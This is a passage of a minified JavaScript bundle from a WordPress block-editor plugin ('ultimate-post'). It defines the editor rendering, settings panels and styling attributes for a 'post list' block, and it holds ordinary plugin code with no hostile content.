t=S(null),{setAttributes:l,name:M,clientId:A,isSelected:H,className:N,attributes:j,context:Z,attributes:{blockId:O,currentPostId:R,readMoreIcon:D,imgCrop:z,excerptLimit:F,metaStyle:W,metaShow:V,catShow:G,showImage:q,metaSeparator:$,titleShow:K,catStyle:J,catPosition:Y,titlePosition:X,excerptShow:Q,showFullExcerpt:ee,imgAnimation:te,imgOverlayType:le,imgOverlay:oe,metaList:ae,readMore:ie,readMoreText:ne,metaPosition:re,columns:se,customCatColor:pe,onlyCatColor:ce,contentTag:ue,titleTag:de,showSeoMeta:me,titleLength:ge,metaMinText:ye,metaAuthorPrefix:be,titleStyle:ve,layout:he,gridStyle:fe,metaDateFormat:ke,authorLink:we,fallbackEnable:xe,imgCropSmall:Te,vidIconEnable:_e,notFoundMessage:Ce,excerptLimitLg:Ee,fullExcerptLg:Se,dcEnabled:Pe,dcFields:Le,previewImg:Ie,advanceId:Be,paginationShow:Ue,paginationAjax:Me,headingShow:Ae,filterShow:He,paginationType:Ne,navPosition:je,paginationNav:Ze,loadMoreText:Oe,paginationText:Re,V4_1_0_CompCheck:{runComp:De}}}=e,[ze,Fe]=E(w.Ti),[We,Ve]=E(null);function Ge(e){Fe({...ze,selectedDC:e})}function qe(){Fe({...ze,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function $e(e){Fe({...ze,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),Ve("setting")}function Ke(e){Fe((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function Je(){ze.error&&Fe({...ze,error:!1}),ze.loading||Fe({...ze,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(j)}).then((e=>{Fe({...ze,postsList:e,loading:!1})})).catch((e=>{Fe({...ze,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),Je()}),[]),C((()=>{const t=A.substr(0,6),o=B(U(A));(0,a.qi)(l,o,R,A),(0,v.h)(e),O?O&&O!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[A]),C((()=>{const e=t.current;(0,h.o6)()&&0===j.dcFields.length&&l({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,j)&&(Je(),t.current=j),e.isSelected!==H&&H&&(0,w.gT)($e,Ke)):t.current=j}),[j]);const Ye={settingTab:We,setSettingTab:Ve,setAttributes:l,name:M,attributes:j,setSection:$e,section:ze.section,clientId:A,context:Z,setSelectedDc:Ge,selectedDC:ze.selectedDC,selectParentMetaGroup:function(e){Ge(e),Ke("dc_group")}};let Xe;if(O&&(Xe=(0,y.Kh)(j,"ultimate-post/post-list-1",O,(0,a.k0)())),Ie&&!H)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Ie});C((()=>{H&&Ie&&l({previewImg:""})}),[e?.isSelected]);const Qe=_({...Be&&{id:Be},className:`ultp-block-${O} ${N}`,onClick:e=>{e.stopPropagation(),$e("general"),Ke("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:Ye,selected:ze.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:Ye})),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",include:[{position:1,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}}],exclude:["spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout+adv_style",layoutData:{type:"layout",block:"post-list-1",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl1/l1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/pl1/l2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/pl1/l3.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/pl1/l4.png",label:"Layout 4",value:"layout4",pro:!0}]},advStyleData:{type:"layout",key:"gridStyle",pro:!0,tab:!0,label:__("Advanced Style","ultimate-post"),block:"post-list-1",options:[{img:"assets/img/layouts/pl1/s1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/pl1/s2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/pl1/s3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0}]}},{type:"feat_toggle",label:__("Post List Features","ultimate-post"),new:a.KE,[De?"exclude":"dep"]:a.N2}],store:Ye}),(0,o.createElement)("div",Qe,Xe&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Xe}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ae||He||Ue)&&(0,o.createElement)(r.m,{attributes:j,setAttributes:l,onClick:()=>{$e("heading"),Ke("heading")},setSection:$e,setToolbarSettings:Ke}),function(){const e=`${ue}`,t=(e,t)=>(0,h.o6)()&&Pe&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Le,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ke(t)},selectedDC:ze.selectedDC,setSelectedDc:Ge,setAttributes:l,dcFields:Le});return ze.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):ze.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):ze.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-pl1a-${fe} ultp-block-column-${se.lg} ultp-post-list1-${he}`},ze.postsList.map(((a,r)=>{const p=JSON.parse(ae.replaceAll("u0022",'"')),u="style1"!=fe?0==r?z:Te:z,d=(a.image&&!a.is_fallback||xe)&&q?(0,o.createElement)(s.ZP,{catPosition:Y,imgOverlay:oe,imgOverlayType:le,imgAnimation:te,post:a,imgSize:u,fallbackEnable:xe,vidIconEnable:_e,idx:r,Category:"aboveTitle"!=Y?(0,o.createElement)(i.Z,{post:a,catShow:G,catStyle:J,catPosition:Y,customCatColor:pe,onlyCatColor:ce,onClick:()=>{$e("taxonomy-/-category"),Ke("cat")}}):null,onClick:()=>{$e("image"),Ke("image")},vidOnClick:()=>{$e("video"),Ke("video")}}):null;return(0,o.createElement)(e,{key:r,className:`ultp-block-item post-id-${a.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},(0,o.createElement)("div",{className:"ultp-block-entry-content"},t(9,a.ID),"style3"==fe&&0==r&&d,(0,o.createElement)("div",{className:"ultp-block-entry-heading"},t(8,a.ID),"aboveTitle"==Y&&(0,o.createElement)(i.Z,{post:a,catShow:G,catStyle:J,catPosition:Y,customCatColor:pe,onlyCatColor:ce,onClick:()=>{$e("taxonomy-/-category"),Ke("cat")}}),t(7,a.ID),a.title&&K&&1==X&&(0,o.createElement)(g.Z,{title:a.title,headingTag:de,titleLength:ge,titleStyle:ve,onClick:e=>{$e("title"),Ke("title")}}),t(6,a.ID),V&&"top"==re&&(0,o.createElement)(c.Z,{meta:p,post:a,metaSeparator:$,metaStyle:W,metaMinText:ye,metaAuthorPrefix:be,metaDateFormat:ke,authorLink:we,onClick:e=>{$e("meta"),Ke("meta")}}),t(5,a.ID),a.title&&K&&0==X&&(0,o.createElement)(g.Z,{title:a.title,headingTag:de,titleLength:ge,titleStyle:ve,onClick:e=>{$e("title"),Ke("title")}}),t(4,a.ID)),("style3"!=fe||"style3"==fe&&0!=r)&&d),(0,o.createElement)("div",{className:"ultp-block-content"},t(3,a.ID),Q&&(0,o.createElement)(n.Z,{excerpt:a.excerpt,excerpt_full:a.excerpt_full,seo_meta:a.seo_meta,excerptLimit:F,showFullExcerpt:ee,showSeoMeta:me,onClick:e=>{$e("excerpt"),Ke("excerpt")}}),t(2,a.ID),ie&&(0,o.createElement)(m.Z,{readMoreText:ne,readMoreIcon:D,titleLabel:a.title,onClick:()=>{$e("read-more"),Ke("read-more")}}),t(1,a.ID),V&&"bottom"==re&&(0,o.createElement)(c.Z,{meta:p,post:a,metaSeparator:$,metaStyle:W,metaMinText:ye,metaAuthorPrefix:be,metaDateFormat:ke,authorLink:we,onClick:e=>{$e("meta"),Ke("meta")}}),t(0,a.ID),(0,h.o6)()&&Pe&&(0,o.createElement)(f.Z,{dcFields:Le,setAttributes:l,startOnboarding:qe}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Ce})}(),Ue&&"loadMore"==Ne&&(0,o.createElement)(p.Z,{loadMoreText:Oe,onClick:e=>{$e("pagination"),Ke("pagination")}}),Ue&&"navigation"==Ne&&"topRight"!=je&&(0,o.createElement)(u.Z,{onClick:()=>{$e("pagination"),Ke("pagination")}}),Ue&&"pagination"==Ne&&(0,o.createElement)(d.Z,{paginationNav:Ze,paginationAjax:Me,paginationText:Re,onClick:e=>{$e("pagination"),Ke("pagination")}}))))}},32616:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=10,b=e=>{const{store:t}=e,{layout:l,gridStyle:n,queryType:r,advFilterEnable:u,advPaginationEnable:d,V4_1_0_CompCheck:{runComp:y}}=t.attributes,{context:b,section:v,settingTab:h,setSettingTab:f}=t;return g((()=>{(0,m.CH)(b,u,t,d)}),[u,d,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6836",store:t}),(0,o.createElement)(p.Sections,{settingTab:h,setSettingTab:f},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:v.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-list-1",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl1/l1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/pl1/l2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/pl1/l3.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/pl1/l4.png",label:"Layout 4",value:"layout4",pro:!0}],variation:{layout1:{columns:{lg:"2",xs:"2"},headerSpaceX:{lg:"",unit:"px"},headerWrapBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"30",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"16",left:"16",right:"16",bottom:"16",unit:"px"}},metaList:'["metaAuthor","metaDate","metaRead"]',metaMargin:{lg:{top:"15",bottom:"15",unit:"px"},xs:{top:"10",bottom:"10",unit:"px"}},excerptLimit:"20"},layout2:{columns:{lg:"2",xs:"1"},headerSpaceX:{lg:"20",unit:"px"},headerWrapBorder:{width:{top:"1",right:"1",bottom:"1",left:"1",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"0",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"0",left:"16",right:"16",bottom:"16",unit:"px"}},metaList:'["metaAuthor","metaDate"]',metaMargin:{lg:{top:"15",bottom:"0",unit:"px"},xs:{top:"15",bottom:"0",unit:"px"}},excerptLimit:"35"},layout3:{columns:{lg:"2",xs:"1"},headerSpaceX:{lg:"",unit:"px"},headerWrapBorder:{width:{top:"1",right:"1",bottom:"1",left:"1",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"0",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"0",left:"16",right:"16",bottom:"16",unit:"px"}},metaList:'["metaAuthor","metaDate"]',metaMargin:{lg:{top:"15",bottom:"0",unit:"px"},xs:{top:"15",bottom:"0",unit:"px"}},excerptLimit:"35"},layout4:{columns:{lg:"2",xs:"1"},headerSpaceX:{lg:"20",unit:"px"},headerWrapBorder:{width:{top:"1",right:"1",bottom:"1",left:"1",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"0",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"0",left:"16",right:"16",bottom:"16",unit:"px"}},metaList:'["metaAuthor","metaDate"]',metaMargin:{lg:{top:"15",bottom:"0",unit:"px"},xs:{top:"15",bottom:"0",unit:"px"}},excerptLimit:"35"}}}},{position:1,data:{type:"layout",key:"gridStyle",pro:!0,tab:!0,label:__("Advanced Style","ultimate-post"),block:"post-list-1",options:[{img:"assets/img/layouts/pl1/s1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/pl1/s2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/pl1/s3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0}]}},{position:6,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:v.title,include:["style1"!=n&&{position:3,data:{type:"typography",key:"postListTypo",label:__("Large Title Typography","ultimate-post")}}],exclude:["titleBackground"],hrIdx:[4,8]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:v.image,include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:v.meta,exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:v["taxonomy-/-category"],depend:"catShow",store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:v.excerpt,store:t,include:[{position:3,data:{type:"toggle",key:"fullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:4,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}},"layout1"==l&&"style1"!=n&&{position:8,data:{type:"dimension",key:"excerptPadddingLg",label:__("Padding ( Large Post )","ultimate-post"),step:1,unit:!0,responsive:!0}}],hrIdx:[3,6]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:v["read-more"],depend:"readMore"}),(0,o.createElement)(a.rS,{initialOpen:v.video,depend:"vidIconEnable",store:t}),"layout1"!=l&&(0,o.createElement)(a.$U,{store:t}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"]}),(0,o.createElement)(a.Yp,{depend:"separatorShow",exclude:["septSpace"],store:t}),!y&&(0,o.createElement)(i.Z,{open:v.filter||v.pagination||v.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:v.heading,depend:"headingShow"}),"posts"!=r&&"customPosts"!=r&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:v.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:v.pagination,depend:"paginationShow",store:t}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{gridStyle:l,layout:i,V4_1_0_CompCheck:{runComp:s}}=t.attributes,{metaShow:p,showImage:c,titleShow:m,catPosition:g,titlePosition:y,excerptShow:b,readMore:v,metaPosition:h,fallbackEnable:f,catShow:k}=t.attributes,w=[p&&"bottom"==h,v,b,f&&c&&"style3"!=l,m&&0==y,p&&"top"==h,m&&1==y,k&&"aboveTitle"==g,f&&c&&"style3"==l];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:w});switch(e){case"filter":return s?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return s?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return s?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo","style1"!=l&&{data:{type:"typography",key:"postListTypo",label:__("Large Title Typography","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:3,data:{type:"toggle",key:"fullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:4,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}},"layout1"==i&&"style1"!=l&&{position:8,data:{type:"dimension",key:"excerptPadddingLg",label:__("Padding ( Large Post )","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgMargin"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]}));default:return null}}},36682:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},gridStyle:{type:"string",default:"style1"},columns:{type:"object",default:{lg:"2",sm:"2",xs:"1"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"30",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},rowSpace:{type:"object",default:{lg:"30"},style:[{depends:[{key:"separatorShow",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-row {row-gap: {{rowSpace}}px; }"},{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { padding-bottom: {{rowSpace}}px; margin-bottom:{{rowSpace}}px; }"}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a { text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; 